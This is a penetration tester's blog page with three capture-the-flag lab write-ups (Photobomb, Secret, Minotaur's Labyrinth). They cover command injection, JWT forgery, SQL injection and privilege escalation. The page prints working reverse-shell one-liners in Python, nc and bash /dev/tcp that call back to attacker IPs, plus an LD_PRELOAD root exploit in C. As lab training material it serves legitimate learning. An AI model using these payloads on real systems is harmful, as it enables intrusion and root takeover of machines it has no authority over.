Mostrando entradas con la etiqueta command-injection. Mostrar todas las entradas
Mostrando entradas con la etiqueta command-injection. Mostrar todas las entradas

sábado, 11 de febrero de 2023

Photobomb HackTheBox Writeup

 


Scanning

We launch nmap tool with scripts and versions on all ports.


We see that nmap shows us the domain "photobomb.htb", so we include it in our "/etc/hosts" file.

Enumeration

We access the website:


If we try to access the link, we are asked for access credentials:

We review the source code, find the file "photobomb.js" and inside it some hardcoded credentials:


We enter the credentials, see that they work and it takes us to a kind of image gallery.


The machine is slow, I don't know if it's like that, but fuzzing is not the best ally in this occasion, I tried to put a slash "/printer/" and I saw that it returned an error where it tried to load an image in an internal port and to the directory "__sinatra__":



Exploitation

From the name of the machine, I assumed that the entry point or vulnerability would have to be in the one thing it had, downloading images.


As we saw before, it makes a GET to download the photo, so even if we see the code, we could try to escape and execute malicious code..

Petición legítima:


Command injection request:


Since I was able to inject a command, I tried several reverse shells, but this was the only one that worked.

Reverse shell:

 export RHOST="10.10.14.13";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'  

We gain access to the machine, enumerate the user and read the user flag:



Privilege Escalation

We do a "sudo -l" and list that we can run as root the script "/opt/cleanup.sh".


We see that SETENV does not require a password, this can be exploited with "LD_Preload" by injecting it next to the script and getting it to run with the internal find:


Exploit code:

 #include <stdio.h>  
 #include <sys/types.h>  
 #include <stdlib.h>  
 void _init() {  
 unsetenv("LD_PRELOAD");  
 setgid(0);  
 setuid(0);  
 system("/bin/sh");  
 }  

We download the file "exploit.so" in temporary and run it together with the script with SUDO, we see that we escalate privileges to root and read the flag.

sábado, 1 de octubre de 2022

sábado, 9 de julio de 2022

sábado, 26 de marzo de 2022

Secret HackTheBox Writeup

logo

Scanning

We run nmap on all ports with scripts and software versions.

Enumeration

We find the API documentation, we have to authenticate using a JWT.

If we try to access without a token, we see that we do not have access to the resource.

If we check the site, there is a link that allows us to download the code.

To get to the point, the file "private.js" shows the role and username of the administrator user of the application.

Using the authentication example from the documentation above, we see that the user "theadmin" is registered with the e-mail address "root@dasith.works":

We register a user.

We decode the JWT and see the data it contains.

We access the previous resource, but we still cannot access it because we are a user with a low privilege role.

We continue with the enumeration, we identify a ".git" and we see that they have made some modification in the ".env" file.

We retrieve the file and read its contents, we find the "token_secret". This token would allow us to modify our JWT and be able to make arbitrary modifications on it.

We add the attribute "role": "admin" and change our user to "theadmin" in our cookie and authenticate, we check that now it works and we have access as the user "theadmin".

Exploitation

Reviewing the sections of the site, we see that the resource "logs?file=" is vulnerable to Command Injection:

We can exploit this vulnerability to read the "user.txt" file.

We use the following payload to gain access (remember to encode it in URL), put a netcat listening and send the request from Burp.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

We list an uncommon setuid binary named "/opt/count".

We see that the resource has the permissions of the root user.

We launch dirsearch, we will list the file "installer/subiquity-server-debug.log", it contains the hashed credentials of the users used in the application.

We tried to crack the hash of the user "dasith", but failed. So we will put our public key in the user's "authorized_keys" file and authenticate with our private key through the SSH service.

Privilege Escalation

Now we execute this statement to cause the crashes and to store in the report log the root flag.

We check the "CoreDump" file and see that the root flag is in it.


About

David Utón is Penetration Tester and security auditor for web and mobiles applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.

Contacted on:

David-Uton @David_Uton

domingo, 7 de noviembre de 2021

Minotaur's Labyrinth TryHackMe Writeup

logo

Scanning

We run nmap on all ports with scripts and software versions.

Enumeration

In the nmap, we see that there is an FTP that can be accessed anonymously, we mount the ftp in our kali and list the first flag.

We found the website, tried default credentials, but nothing.

We reviewed the source code, found a few comments that might be useful (or fake). We are interested in the "login.js" file.

Content of login.js file

Exploitation

We have a comment where comes the password of the user "Daedalus", we make the substitution of the arrays and we obtain the credentials.

We check that the site is vulnerable to SQL Injection (Time-based).

We obtain databases

We obtain tables

We obtain People columns

We obtain the flat password using the hash.

We access with the administrator credentials and find a flag.

We find the secret section, we see that we can execute the ECHO command from this PHP application.

Testing

We tried to bypass it with command.

PoC

Read /etc/passwd

Reverse shell

We create a file with our reverse shell "m3.sh", download it with "wget" on the victim machine, give it execution permissions and execute it.

Executing file m3.sh

We check the version of python installed and configure the terminal to have a more interactive session.

We are looking for the location of the remaining flags.

Read user.txt file

Privilege Escalation

We see the following folder which is not common on a Linux system. Inside, there is a file with a script, it may be running from time to time.

We download pspy64, run it and see how the user "root (UID=0)" is running the script every so often.

We add the following line to the file "timer.sh" to get a shell with the user that executes the file.

echo "bash -i >& /dev/tcp/XX.XX.XX.XX/555 0>&1" >> timer.sh

We wait a few minutes and we will get a shell as root and read the flag.


About

David Utón is Penetration Tester and security auditor for web and mobiles applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.

Contacted on:

David-Uton @David_Uton